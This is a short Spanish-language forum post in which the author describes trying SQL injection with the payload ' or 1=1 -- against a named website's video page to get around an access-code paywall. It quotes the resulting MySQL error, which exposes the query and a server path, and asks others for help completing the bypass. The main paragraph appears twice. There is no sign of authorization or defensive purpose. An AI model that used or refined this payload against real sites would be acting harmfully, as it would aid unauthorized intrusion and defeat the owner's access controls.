En la pagina http://www.laweb.com/video_details.php?id=43 pide un código para poder ver el video completo, he intentado hacer un ataque por sql injection y conseguido que falle y me muestre información de la select que ejecuta pero no he conseguido ver el video.
El error que consigo que me usando 'or 1=1 -- es:
Fatal error: mysql error: [1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '43'' at line 1] in EXECUTE("SELECT * FROM video_files as vf LEFT JOIN access_code_video as acv ON vf.file_id=acv.video_id where acv.access_code ='' or 1=1 --' and acv.video_id='43'") in /var/www/vhosts/mywaxing.com/httpdocs/application/components/NADOdb/NADOdb.php on line 706
Alguien me puede echar una mano?
El error que consigo que me usando 'or 1=1 -- es:
Fatal error: mysql error: [1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '43'' at line 1] in EXECUTE("SELECT * FROM video_files as vf LEFT JOIN access_code_video as acv ON vf.file_id=acv.video_id where acv.access_code ='' or 1=1 --' and acv.video_id='43'") in /var/www/vhosts/mywaxing.com/httpdocs/application/components/NADOdb/NADOdb.php on line 706
Alguien me puede echar una mano?